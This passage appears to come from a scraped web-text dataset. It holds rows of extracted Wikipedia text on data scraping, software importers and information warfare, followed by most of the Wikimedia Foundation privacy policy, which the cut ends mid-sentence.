Computer-to-user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today, for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50-year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24×80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data into numeric data for inclusion in calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally, Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX/VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or, for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined, in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, toolkits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport and storage mechanism between the client and the web server. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
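The 1980s "page shredding" workflow described above amounts to slicing fixed-width character rows out of a captured screen and converting the text into numbers. Below is a minimal sketch under invented assumptions: the 24×80-style screen contents and the column positions are made up for illustration and are not taken from any real Reuters, Telerate, or Quotron page.

# The screen rows are built with ljust() here only so the example stays aligned;
# a real capture would arrive as raw fixed-width text from the terminal.
SCREEN = [
    "INSTRUMENT".ljust(16) + "BID".ljust(10) + "ASK".ljust(10) + "LAST".ljust(10),
    "ACME CORP".ljust(16) + "101.25".ljust(10) + "101.40".ljust(10) + "101.30".ljust(10),
    "GLOBEX LTD".ljust(16) + "47.10".ljust(10) + "47.25".ljust(10) + "47.15".ljust(10),
]

# (start, end) column slices for each field on a fixed-width data row.
FIELDS = {
    "instrument": (0, 16),
    "bid": (16, 26),
    "ask": (26, 36),
    "last": (36, 46),
}

def shred_page(lines):
    # Convert human-readable screen rows into numeric records ("page shredding").
    records = []
    for line in lines[1:]:  # skip the header row
        record = {}
        for name, (start, end) in FIELDS.items():
            raw = line[start:end].strip()
            record[name] = raw if name == "instrument" else float(raw)
        records.append(record)
    return records

print(shred_page(SCREEN))
# [{'instrument': 'ACME CORP', 'bid': 101.25, 'ask': 101.4, 'last': 101.3}, ...]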
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
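As a rough illustration of the report mining described above, the sketch below parses a spooled text report (the kind that would otherwise go to a printer) into a structured table. The report layout, field names, and regular expression are invented for the example; a real report would need its own row pattern.

import re
import pandas as pd

# A spooled report captured as plain text instead of being sent to a printer.
# The layout is invented for this example.
REPORT = """\
MONTHLY SALES REPORT                     PAGE 1
DEPT   REGION      UNITS     REVENUE
D01    NORTH         120    14,500.00
D01    SOUTH          95    11,275.50
D02    NORTH          40     4,980.00
END OF REPORT
"""

# One pattern per data row: department code, region, integer units, decimal revenue.
ROW = re.compile(r"^(D\d+)\s+(\w+)\s+(\d+)\s+([\d,]+\.\d{2})\s*$")

def mine_report(text):
    rows = []
    for line in text.splitlines():
        match = ROW.match(line)
        if match:  # page banners, headers, and trailers simply fail to match
            dept, region, units, revenue = match.groups()
            rows.append({
                "dept": dept,
                "region": region,
                "units": int(units),
                "revenue": float(revenue.replace(",", "")),
            })
    return pd.DataFrame(rows)

print(mine_report(REPORT))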
633 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Importer_(computing) | An importer is a software application that reads a data file or metadata in one format and converts it to another format via special algorithms (such as filters). An importer is often not an entire program by itself but an extension to another program, implemented as a plug-in. When implemented in this way, the importer reads the data from the file and converts it into the hosting application's native format. 1 For example, the data file for a 3D model may be written by a modeler, such as 3D Studio Max. A game developer may then want to use that model in their game's editor. An importer, part of the editor, may read in the 3D Studio Max model and convert it to the game's native format so it can be used in game levels. Importers are important tools in the video game industry. A plug-in or application that does the converse of an importer is called an exporter. |
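The importer-as-plug-in pattern described above can be sketched briefly in Python. Everything here is hypothetical: the ".objx" text format, the extension registry, and the "native" dictionary structure are invented stand-ins for a host application's real plug-in API, and this is not how 3D Studio Max files are actually parsed.

# Registry of importer plug-ins keyed by file extension; a host application
# would populate this by discovering plug-ins at start-up.
IMPORTERS = {}

def register_importer(extension):
    def decorator(func):
        IMPORTERS[extension] = func
        return func
    return decorator

@register_importer(".objx")
def import_objx(path):
    # Convert a made-up ".objx" text model ("v x y z" vertex lines and
    # "f i j k" face lines) into the host's hypothetical native dict format.
    vertices, faces = [], []
    with open(path) as handle:
        for line in handle:
            parts = line.split()
            if not parts:
                continue
            if parts[0] == "v":
                vertices.append(tuple(float(value) for value in parts[1:4]))
            elif parts[0] == "f":
                faces.append(tuple(int(index) for index in parts[1:4]))
    return {"vertices": vertices, "faces": faces}

def load_asset(path):
    # Dispatch to whichever importer plug-in claims the file's extension.
    for extension, importer in IMPORTERS.items():
        if path.endswith(extension):
            return importer(path)
    raise ValueError("No importer registered for " + path)

# Hypothetical usage: load_asset("model.objx")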
634 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Information_warfare | Information warfare (IW) is the battlespace use and management of information and communication technology (ICT) in pursuit of a competitive advantage over an opponent. It is different from cyberwarfare that attacks computers, software, and command control systems. Information warfare is the manipulation of information trusted by a target without the target's awareness so that the target will make decisions against their interest but in the interest of the one conducting information warfare. 1 2 As a result, it is not clear when information warfare begins, ends, and how strong or destructive it is. 3 Information warfare may involve the collection of tactical information, assurance(s) that one's information is valid, spreading of propaganda or disinformation to demoralize or manipulate 4 the enemy and the public, undermining the quality of the opposing force's information, and denial of information-collection opportunities to opposing forces. Information warfare is closely linked to psychological warfare. 5 The United States Armed Forces' use of the term favors technology and hence tends to extend into the realms of electronic warfare, cyberwarfare, information assurance and computer network operations, attack, and defense. Other militaries use the much broader term information operations which, although making use of technology, focuses on the more human-related aspects of information use, including (amongst many others) social network analysis, decision analysis, and the human aspects of command and control. Information warfare has been described as "the use of information to achieve our national objectives. 6 According to NATO, "Information war is an operation conducted in order to gain an information advantage over the opponent. 7 Information warfare can take many forms: The United States Air Force has had Information Warfare Squadrons since the 1980s. In fact, the official mission of the U.S. Air Force is now "To fly, fight and win... in air, space and cyberspace", 9 with the latter referring to its information warfare role. As the U.S. Air Force often risks aircraft and aircrews to attack strategic enemy communications targets, remotely disabling such targets using software and other means can provide a safer alternative. In addition, disabling such networks electronically (instead of explosively) also allows them to be quickly re-enabled after the enemy territory is occupied. Similarly, counter-information warfare units are employed to deny such capability to the enemy. The first application of these techniques was used against Iraqi communications networks in the Gulf War. Also during the Gulf War, Dutch hackers allegedly stole information about U.S. troop movements from U.S. Defense Department computers and tried to sell it to the Iraqis, who thought it was a hoax and turned it down. 10 In January 1999, U.S. Air Intelligence computers were hit by a coordinated attack (Moonlight Maze), part of which came from a Russian mainframe. This could not be confirmed as a Russian cyber attack due to non-attribution the principle that online identity may not serve as proof of real-world identity. 11 12 13 Within the realm of cyberspace, there are two primary weapons: network-centric warfare and C4ISR, which denotes integrated Command, Control, Communications, Computers, Intelligence, Surveillance and Reconnaissance. 
Furthermore, cyberspace attacks initiated by one nation against another nation have an underlying goal of gaining information superiority over the attacked party, which includes disrupting or denying the victimized party's ability to gather and distribute information. A real-world occurrence that illustrated the dangerous potential of cyberattacks transpired in 2007, when a strike from Israeli forces demolished an alleged nuclear reactor in Syria that was being constructed via a collaborative effort between Syria and North Korea. Accompanied by the strike was a cyberattack on Syria's air defenses, which left them blind to the attack on the nuclear reactor and, ultimately allowed for the attack to occur (New York Times 2014). An example of a more basic attack on a nation within cyberspace is a distributed denial of service (DDOS) attack, which is utilized to hinder networks or websites until they lose their primary functionality. As implied, cyberattacks do not just affect the military party being attacked, but rather the whole population of the victimized nation. Since more aspects of daily life are being integrated into networks in cyberspace, civilian populations can potentially be negatively affected during wartime. For example, if a nation chose to attack another nation's power grid servers in a specific area to disrupt communications, civilians and businesses in that area would also have to deal with power outages, which could potentially lead to economic disruptions as well. Moreover, physical ICTs have also been implemented into the latest revolution in military affairs by deploying new, more autonomous robots (i.e. unmanned drones) into the battlefield to carry out duties such as patrolling borders and attacking ground targets. Humans from remote locations pilot many of the unmanned drones, however, some of the more advanced robots, such as the Northrop Grumman X 47B, are capable of autonomous decisions. Despite piloting drones from remote locations, a proportion of drone pilots still suffer from stress factors of more traditional warfare. According to NPR, a study performed by the Pentagon in 2011 found that 29% of drone pilots are "burned out" and undergo high levels of stress. Furthermore, approximately 17% of the drone pilots surveyed as the study were labeled "clinically distressed" with some of those pilots also showing signs of post-traumatic stress disorder. 14 Modern ICTs have also brought advancements to communications management among military forces. Communication is a vital aspect of war for any involved party and, through the implementation of new ICTs such as data-enabled devices, military forces are now able to disseminate information faster than ever before. For example, some militaries are now employing the use of iPhones to upload data and information gathered by drones in the same area. 15 16 In 2022, the Armed Forces of Ukraine have taken advantage of deficiencies in Russian communications by allowing them to piggyback on Ukrainian networks, connect, and communicate. Ukrainian forces then eavesdrop, and cut off Russian communications at a crucial part of the conversation. a To build support before it invaded Ukraine, Russia perpetuated a narrative that claimed the Ukrainian government was committing violence against its own Russian speaking population. By publishing large amounts of disinformation on the internet, the alternate narrative was picked up in search results, such as Google News. 
25 Russian interference in foreign elections, most notably the Russian interference in the 2016 United States elections, has been described as information warfare. 26 27 Russia has also begun to interfere in the 2024 US presidential elections according to Microsoft. 28 According to NBC, Russia is conducting disinformation campaigns in the 2024 US elections against US president, Joe Biden. 29 Research suggests that Russia and the West are also engaged in an information war. For instance, Russia believes that the West is undermining its leader through the encouragement of overthrowing authoritarian regimes and liberal values. In response, Russia promotes the anti-liberal sentiments, including racism, antisemitism, homophobia, and misogyny. 30 29 Russia has sought to promote the idea that the American democratic state is failing. 29 The Telegraph reported in 2024 that China and Russia were promoting Pro Palestinian influencers in order to manipulate British public opinion in favour of Russian and Chinese interests. 31 NBC reported that Russia was using different tools to cause division within the US, by delegitimizing US police operations against Pro Palestinian protests and by pivoting public conversation from the Russian invasion in Ukraine to the Israeli-Palestinian conflict. 29 Russian media activity increased by 400% in the weeks after Hamas’ Oct. 7 attack on Israel. 29 According to a report by Reuters, the United States ran a propaganda campaign to spread disinformation about the Sinovac Chinese COVID 19 vaccine, including using fake social media accounts to spread the disinformation that the Sinovac vaccine contained pork-derived ingredients and was therefore haram under Islamic law. 32 The campaign was described as "payback" for COVID 19 disinformation by China directed against the U.S. 33 The campaign primarily targeted people in the Philippines and used a social media hashtag for "China is the virus" in Tagalog. 32 The campaign ran from 2020 to mid 2021. 32 The primary contractor for the U.S. military on the project was General Dynamics IT, which received $493 million for its role. 32 While information warfare has yielded many advances in the types of attack that a government can make, it has also raised concerns about the moral and legal ambiguities surrounding this particularly new form of war. Traditionally, wars have been analyzed by moral scholars according to just war theory. However, with Information Warfare, Just War Theory fails because the theory is based on the traditional conception of war. Information Warfare has three main issues surrounding it compared to traditional warfare: Recently, legal concerns have arisen centered on these issues, specifically the issue of the right to privacy in the United States of America. Lt. General Keith B. Alexander, who served as the head of Cyber Command under President Barack Obama, noted that there was a "mismatch between our technical capabilities to conduct operations and the governing laws and policies" when writing to the Senate Armed Services Committee. A key point of concern was the targeting of civilian institutions for cyberattacks, to which the general promised to try to maintain a mindset similar to that of traditional war, in which they will seek to limit the impact on civilians. 35 Group specific: US specific: |
635 | https://en.wikipedia.org/wiki/Data_scraping | https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Privacy_policy | It may not be circumvented, eroded, or ignored by Wikimedia Foundation officers or staff nor local policies of any Wikimedia project. Because we believe that you should not have to provide personal information to participate in the free knowledge movement, you may: Because we want to understand how Wikimedia Sites are used so we can make them better for you, we collect some information when you: We are committed to: Be aware: The Wikimedia Foundation is the nonprofit organization that operates collaborative, free knowledge websites, like Wikipedia, Wikimedia Commons, and Wiktionary. This Policy explains how we collect, use, and share your Personal Information. By using Wikimedia Sites, you consent to this Policy. The Wikimedia movement is founded on a simple, but powerful principle: we can do more together than any of us can do alone. We cannot work collectively without gathering, sharing, and analyzing information about our users as we seek new ways to make the Wikimedia Sites more usable, safer, and more beneficial. We believe that information-gathering and use should go hand-in-hand with transparency. This Privacy Policy explains how the Wikimedia Foundation, the non-profit organization that hosts the Wikimedia Sites, like Wikipedia, collects, uses, and shares information we receive from you through your use of the Wikimedia Sites. It is essential to understand that, by using any of the Wikimedia Sites, you consent to the collection, transfer, processing, storage, disclosure, and use of your information as described in this Privacy Policy. That means that reading this Policy carefully is important. We believe that you should not have to provide nonpublic Personal Information to participate in the free knowledge movement. You do not have to provide things like your real name, address, or date of birth to sign up for a standard account or contribute content to the Wikimedia Sites. We do not sell or rent your Personal Information, nor do we give it to others to sell you anything. We use it to figure out how to make the Wikimedia Sites more engaging and accessible, to see which ideas work, and to make learning and contributing more fun. Put simply: we use this information to make the Wikimedia Sites better for you. After all, it is people like you, the champions of free knowledge, who make it possible for the Wikimedia Sites to not only exist, but also grow and thrive. We recognize that only a minority of you are familiar with technical terms like "tracking pixels" and "cookies" used in the Privacy Policy. Whether you are brand new to privacy terminology or you are an expert who just wants a refresher, you might find our Glossary of Key Terms helpful. Because everyone (not just lawyers) should be able to easily understand how and why their information is collected and used, we use common language instead of more formal terms throughout this Policy. To help ensure your understanding of some particular key terms, here is a table of translations: Except as explained below, this Privacy Policy applies to our collection and handling of information about you that we receive as a result of your use of any of the Wikimedia Sites. This Policy also applies to information that we receive from our partners or other third parties. To understand more about what this Privacy Policy covers, please see below. 
For the sake of clarity, this Privacy Policy covers, regardless of language: This Privacy Policy, however, does not cover some situations where we may gather or process information. For example, some uses may be covered by separate privacy policies (like those of the Wikimedia Shop) or sites or services run by third parties (such as third-party developer projects on Wikimedia Cloud Services). To understand more about what this Privacy Policy does not cover, please see below. This section is part of the Privacy Policy and is meant to explain in detail which situations are not covered by our Privacy Policy. Sometimes, volunteers may place a data-collecting tool, such as a script, gadget, tracking pixel, or share button, on a Wikimedia Site without our knowledge. This Policy does not cover how third parties handle the information they receive as a result of such a tool. If you come across such a third-party tool, and you believe it violates this Policy, you can remove the tool yourself, or report it to privacy at wikimedia.org so we can investigate. Where community policies govern information, such as the CheckUser policy, the relevant community may add to the rules and obligations set out in this Policy. However, they are not permitted to create new exceptions or otherwise reduce the protections offered by this Policy. Whatever you post on Wikimedia Sites can be seen and used by everyone. When you make a contribution to any Wikimedia Site, including on user or discussion pages, you are creating a permanent, public record of every piece of content added, removed, or altered by you. The page history will show when your contribution or deletion was made, as well as your username (if you are signed in) or your IP address (if you are not signed in). We may use your public contributions, either aggregated with the public contributions of others or individually, to create new features or data-related products for you or to learn more about how the Wikimedia Sites are used, as further explained below in the "How We Use Information We Receive From You" section of this Privacy Policy. Unless this Policy says otherwise, you should assume that information that you actively contribute to the Wikimedia Sites, including Personal Information, is publicly visible and can be found by search engines. Like most things on the Internet, anything you share may be copied and redistributed throughout the Internet by other people. Please do not contribute any information that you are uncomfortable making permanently public, like revealing your real name or location in your contributions. You should be aware that specific data made public by you or aggregated data that is made public by us can be used by anyone for analysis and to infer further information, such as which country a user is from, political affiliation and gender. You do not need to create an account to use any Wikimedia Site. If you do create an account, you do not need to give us your name or email address (although you can if you choose to, such as for the "Email this user" feature for example). If you do not create an account, your contributions will be publicly attributed to your IP address. Want to create an account? Great Do not want to create an account? No problem You are not required to create an account to read or contribute to a Wikimedia Site, except under rare circumstances. However, if you contribute without signing in, your contribution will be publicly attributed to the IP address associated with your device. 
If you want to create a standard account, in most cases we require only a username and a password. However, if you choose not to provide an email address, we cannot help you recover your password. Your username will be publicly visible, so please be careful about revealing your real name or other Personal Information in your username. Your password is only used to verify that the account is yours. Your IP address is also automatically submitted to us, and we record it temporarily. This is to protect Wikimedia users and project content; in the event of abuse, IP addresses may be associated with usernames as part of an investigation. No other Personal Information is required: no name, no email address, no date of birth, and no credit card information. Once created, user accounts cannot be removed entirely (although you can usually hide the information on your user page if you choose to). This is because your public contributions must be associated with their author (you ). In some circumstances, the Wikimedia communities can assist users with removing additional information related to their account from the projects. To gain a better understanding of the demographics of our users, to localize our services and to learn how we can improve our services, we may ask you for more demographic information, such as gender or age, about yourself. We will tell you if such information is intended to be public or private, so that you can make an informed decision about whether you want to provide us with that information. Providing such information is always completely optional. If you do not want to, you do not have to—it is as simple as that. Some features we offer work better if we know what area you are in. If you consent, we can use GPS (and other technologies commonly used to determine location) to show you more relevant content. We keep information obtained by these technologies confidential, except as provided in this Policy. You can learn more by checking out the list of examples of how we use these technologies in our FAQ. Sometimes, we automatically receive location data from your device. For example, if you want to upload a photo on the Wikimedia Commons mobile app, we may receive metadata, such as the place and time you took the photo, automatically from your device. Please be aware that, unlike location information collected using GPS signals described above, the default setting on your mobile device typically includes the metadata in your photo or video upload to the Wikimedia Sites. If you do not want metadata sent to us and made public at the time of your upload, please change your settings on your device. Finally, when you visit any Wikimedia Site, we automatically receive the IP address of the device (or your proxy server) you are using to access the Internet, which could be used to infer your geographical location. We use certain technologies to collect information about how you use Wikimedia Sites. Like other websites, we receive some information about you automatically when you visit the Wikimedia Sites. We also use a variety of commonly-used technologies, like cookies, to collect information regarding how you use the Wikimedia Sites, make our services safer and easier to use, and to help create a better and more customizable experience for you. We want to make the Wikimedia Sites better for you by learning more about how you use them. 
Examples of this might include how often you visit the Wikimedia Sites, what you like, what you find helpful, how you get to the Wikimedia Sites, and whether you would use a helpful feature more if we explained it differently. We also want this Policy and our practices to reflect our community's values. For this reason, we keep information related to your use of the Wikimedia Sites confidential, except as provided in this Policy. Because of how browsers work, we receive some information automatically when you visit the Wikimedia Sites. This includes when you use an online tool on a third-party site that loads information coming from the Wikimedia Sites. This information includes the type of device you are using (possibly including unique device identification numbers, for some beta versions of our mobile applications), the type and version of your browser, your browser's language preference, the type and version of your device's operating system, in some cases the name of your internet service provider or mobile carrier, the website that referred you to the Wikimedia Sites, which pages you request and visit, and the date and time of each request you make to the Wikimedia Sites. Put simply, we use this information to enhance your experience with Wikimedia Sites. For example, we use this information to administer the sites, provide greater security, and fight vandalism; optimize mobile applications, customize content and set language preferences, test features to see what works, and improve performance; understand how users interact with the Wikimedia Sites, track and study use of various features, gain understanding about the demographics of the different Wikimedia Sites, and analyze trends. We use a variety of commonly-used technologies, like cookies, to understand how you use the Wikimedia Sites, make our services safer and easier to use, and to help create a better and more customizable experience for you. We actively collect some types of information with a variety of commonly-used technologies. These generally include tracking pixels, JavaScript, and a variety of "locally stored data" technologies, such as cookies and local storage. These types of technologies may also be used in online tools on a third-party site that loads information from the Wikimedia Sites. We realize that some of these technologies do not have the best reputation in town and can be used for less-than-noble purposes. So we want to be as clear as we can about why we use these methods and the type of information we collect with them. Depending on which technology we use, locally stored data may include text, Personal Information (like your IP address), and information about your use of the Wikimedia Sites (like your username or the time of your visit). See below for more information. We use this information to make your experience with the Wikimedia Sites safer and better, to gain a greater understanding of user preferences and their interaction with the Wikimedia Sites, and to generally improve our services. We will never use third-party cookies, unless we get your permission to do so. If you ever come across a third-party data collection tool that has not been authorized by you (such as one that may have been mistakenly placed by another user or administrator), please report it to us at privacy wikimedia.org. Locally stored data, JavaScript, and tracking pixels help us do things like: Want to know even more? 
You can read more about some of the specific cookies we use, when they expire, and what we use them for in our FAQ. We believe this data collection helps improve your user experience, but you may remove or disable some or all locally stored data through your browser settings, depending on your browser. You can learn more about some options you have in our FAQ. While locally stored data may not be necessary to use our sites, some features will not function properly if you disable locally stored data. While the examples above concerning information about you collected through the use of data collection tools are kept confidential in accordance with this Policy, please note that some information about the actions taken by your username is made publicly available through public logs alongside actions taken by other users. For example, a public log may include the date your account was created on a Wikimedia Site along with the dates that other accounts were created on a Wikimedia Site. We and our service providers use your information for the legitimate purpose of pursuing our charitable mission, including: We engage in these activities to manage our relationship with you, because we have a legitimate interest and or to comply with our legal obligations. We will customize the Services, in some instances, with your consent; or in keeping with our legitimate interest. We will send these types of emails to you only with your consent except as otherwise permitted by applicable law. We do not sell, rent, or use your email address to advertise third-party products or services to you. You can manage what kinds of notifications you receive and how often you receive them by going to your Notifications Preferences and User profile. You can learn more about email and notifications and how to change your preferences in our FAQ. We will always tell you, at the time we give you an opportunity to share your thoughts, how we plan on using your answers and any Personal Information you provide. Your responses to our surveys and feedback requests are always optional. We will email these types of requests to you only with your consent except as otherwise permitted by applicable law. You can manage what kinds of notifications you receive and how often you receive them by going to your Notifications Preferences and User profile. You can learn more about email and notifications and how to change your preferences in our FAQ. We engage in these activities to further our legitimate interest and or to comply with our legal obligations. As stated above, we can use commonly-used location technologies to show you more relevant content. For example, our mobile apps can identify articles from the Wikimedia sites about points of interest near your location. As a reminder, you can consent to and or deactivate our access to these location technologies at any time for example through the native OS functionalities on your mobile device, and still use the Wikimedia Sites. As stated above, we may automatically receive location data from your device. For example, if you upload a photo using the Wikimedia Commons mobile app, please be aware that the default setting on your mobile device typically results in the metadata associated with your photo being included in the upload. As a reminder, if you do not want metadata sent to us and made public at the time of your upload, please change your settings on your device. 
When you visit any Wikimedia Site, we automatically receive the IP address of the device (or your proxy server) you are using to access the Internet, which could be used to infer your geographical location. We keep IP addresses confidential, except as provided in this Policy. If you are visiting Wikimedia Sites with your mobile device, we may use your IP address to provide anonymized or aggregated information to service providers regarding the volume of usage in certain areas. We use this location information to make your experience with the Wikimedia Sites safer and better, to gain a greater understanding of user preferences and their interaction with the Wikimedia Sites, and to generally improve our services. For example, we use this information to provide greater security, optimize mobile applications, and learn how to expand and better support Wikimedia communities. We also use Personal Information in the manner described in the sections of this Policy titled "For Legal Reasons" and "To Protect You, Ourselves Others. We use and share your Personal Information when you give us specific permission to do so, for legal reasons, and in the other circumstances described below. We share your Personal Information for a particular purpose, if you agree. For example, if you receive a scholarship and we ask permission to share your Personal Information with a local chapter. You can find more information in the list of examples in our FAQ. We will disclose your Personal Information to public authorities or other persons in response to an official legal process only if we believe it to be legally valid. See also our Requests for user information procedures and guidelines. We will notify you of such requests when possible. We do so to further our legitimate interest and or to comply with our legal obligations. We will access, use, preserve, and or disclose your Personal Information if we reasonably believe it necessary to satisfy a valid and legally enforceable warrant, subpoena, court order, law or regulation, or other judicial or administrative order. However, if we believe that a particular request for disclosure of a user's information is legally invalid or an abuse of the legal system and the affected user does not intend to oppose the disclosure themselves, we will try our best to fight it. We are committed to notifying you via email at least ten (10) calendar days, when possible, before we disclose your Personal Information in response to a legal demand. However, we may only provide notice if we are not legally restrained from contacting you, there is no credible threat to life or limb that is created or increased by disclosing the request, and you have provided us with an email address. Nothing in this Privacy Policy is intended to limit any legal objections or defenses you may have to a third-party's request (whether it be civil, criminal, or governmental) to disclose your Personal Information. We recommend seeking the advice of legal counsel immediately if such a request is made involving you. For more information, see our Subpoena FAQ. In the unlikely event that the ownership of the Foundation changes, we will provide you 30 days' notice before any Personal Information is transferred to the new owners or becomes subject to a different privacy policy. 
In the extremely unlikely event that ownership of all or substantially all of the Foundation changes, or we go through a reorganization (such as a merger, consolidation, or acquisition), consistent with our legitimate interest, we will continue to keep your Personal Information confidential, except as provided in this Policy, and provide notice to you via the Wikimedia Sites and a notification on WikimediaAnnounce-L or similar mailing list at least thirty (30) calendar days before any Personal Information is transferred or becomes subject to a different privacy policy. We, or users with certain administrative rights, use and disclose Personal Information that is reasonably necessary to: We do so to manage our relationship with you, to further our legitimate interest, and or to comply with our legal obligations. We, or particular users with certain administrative rights as described below, need to use and share your Personal Information if it is reasonably believed to be necessary to enforce or investigate potential violations of our Terms of Use, this Privacy Policy, or any Wikimedia Foundation or user community-based policies. We may also need to access and share Personal Information to investigate and defend ourselves against legal threats or actions. Wikimedia Sites are collaborative, with users writing most of the policies and selecting from amongst themselves people to hold certain administrative rights. These rights may include access to limited amounts of otherwise nonpublic information about recent contributions and activity by other users. They use this access to help protect against vandalism and abuse, fight harassment of other users, and generally try to minimize disruptive behavior on the Wikimedia Sites. These various user-selected administrative groups have their own privacy and confidentiality guidelines, but all such groups are supposed to agree to follow our Access to nonpublic personal data policy. These user-selected administrative groups are accountable to other users through checks and balances: users are selected through a community-driven process and overseen by their peers through a logged history of their actions. However, the legal names of these users are not known to the Wikimedia Foundation. We hope that this never comes up, but we may disclose your Personal Information if we believe that it is reasonably necessary to prevent imminent and serious bodily harm or death to a person, or to protect our organization, employees, contractors, users, or the public. We may also disclose your Personal Information if we reasonably believe it necessary to detect, prevent, or otherwise assess and address potential spam, malware, fraud, abuse, unlawful activity, and security or technical concerns. (Check out the list of examples in our FAQ for more information.) We disclose Personal Information to our third-party service providers or contractors to help run or improve the Wikimedia Sites and provide services in support of our mission. We use third-party service providers or contractors to help run or improve the Wikimedia Sites for you and other users. We give access to your Personal Information to these providers or contractors as needed to perform their services for us or to use their tools and services. We put requirements, such as confidentiality agreements, in place to help ensure that these service providers treat your Personal Information consistently with, and no less protective of your privacy than, the principles of this Policy. 
For further information, please see our FAQ. If you are visiting Wikimedia Sites with your mobile device, we use your IP address to provide anonymized or aggregated information to service providers regarding the volume of usage in certain areas. Some of our service providers ask us to post links to their privacy policies; a list of these service providers and links to their policies can be found on this page. The open-source software that powers the Wikimedia Sites depends on the contributions of volunteer software developers, who spend time writing and testing code to help it improve and evolve with our users' needs. To facilitate their work, we give some developers limited access to systems that contain your Personal Information, but only as reasonably necessary for them to develop and contribute to the Wikimedia Sites. Similarly, we share non-Personal Information or aggregated information with researchers, scholars, academics, and other interested third parties who wish to study the Wikimedia Sites. Sharing this Personal Information helps them understand usage, viewing, and demographics statistics and patterns. They then can share their findings with us and our users so that we can all better understand and improve the Wikimedia Sites. When we give access to Personal Information to third-party developers or researchers, we put requirements, such as reasonable technical and contractual protections, in place to help ensure that these service providers treat your Personal Information consistently with the principles of this Policy and in accordance with our instructions. If these developers or researchers later publish their work or findings, we ask that they not disclose your Personal Information. Please note that, despite the obligations we impose on developers and researchers, we cannot guarantee that they will abide by our agreement, nor do we guarantee that we will regularly screen or audit their projects. (You can learn more about re-identification in our FAQ.) Information that you post is public and can be seen and used by everyone. Any information you post publicly on the Wikimedia Sites is just that public. For example, if you put your mailing address on your talk page, that is public, and not specifically protected by this Policy. And if you edit without registering or logging into your account, your IP address will be seen publicly. Please think carefully about your desired level of privacy before you disclose Personal Information on your user page or elsewhere. We use a variety of physical and technical measures, policies, and procedures to help protect your Personal Information from unauthorized access, use, or disclosure. We strive to protect your Personal Information from unauthorized access, use, or disclosure. We use a variety of physical and technical measures, policies, and procedures (such as access control procedures, network firewalls, and physical security) designed to protect our systems and your Personal Information. Unfortunately, there is no such thing as completely secure data transmission or storage, so we cannot guarantee that our security will not be breached (by technical measures or through violation of our policies and procedures). We will never ask for your password by email (but may send you a temporary password via email if you have requested a password reset). If you ever receive an email that requests your password, please let us know by sending it to privacy wikimedia.org, so we can investigate the source of the email. 
Except as otherwise stated in this Policy, we only keep your Personal Information as long as necessary to maintain, understand and improve the Wikimedia Sites or to comply with applicable law. Once we receive Personal Information from you, we keep it for the shortest possible time that is consistent with the maintenance, understanding, and improvement of the Wikimedia Sites, and our obligations under applicable law. In most instances, Personal Information is deleted, aggregated or de-identified after 90 days. Non-Personal Information may be retained indefinitely as appropriate. (Check out the list of examples in our FAQ.) Please remember that when you make a contribution to any Wikimedia Site, the page history will show when your contribution was made, your username (if you are signed in), or your IP address (if you edit while not logged in). The transparency of the projects' contribution and revision histories is critical to their efficacy and trustworthiness. To learn more about our data retention practices, see our data retention guidelines. If you would like to request access to or removal of your Personal Information, you may contact us. For information about how you may request removal of your Personal Information, or other rights you may have with respect to your Personal Information, see our FAQ. If you would like to request to access, update, restrict, or object to the processing of Personal Information, or receive a copy of your Personal Information for purposes of transmitting it to another organization, you may Contact Us. We will respond to your request consistent with applicable law. Please note also that you may be able to exercise some of these rights without our intervention. For example, if you are a registered user, you can access and update some Personal Information in your Preferences, as well as download your user account data. You may also manage what kinds of notifications you receive and how often you receive them by going to your Notifications Preferences. For the protection of the Wikimedia Foundation and other users, if you do not agree with this Privacy Policy, you may not use the Wikimedia Sites. The Wikimedia Foundation is a non-profit organization based in San Francisco, California, with servers and data 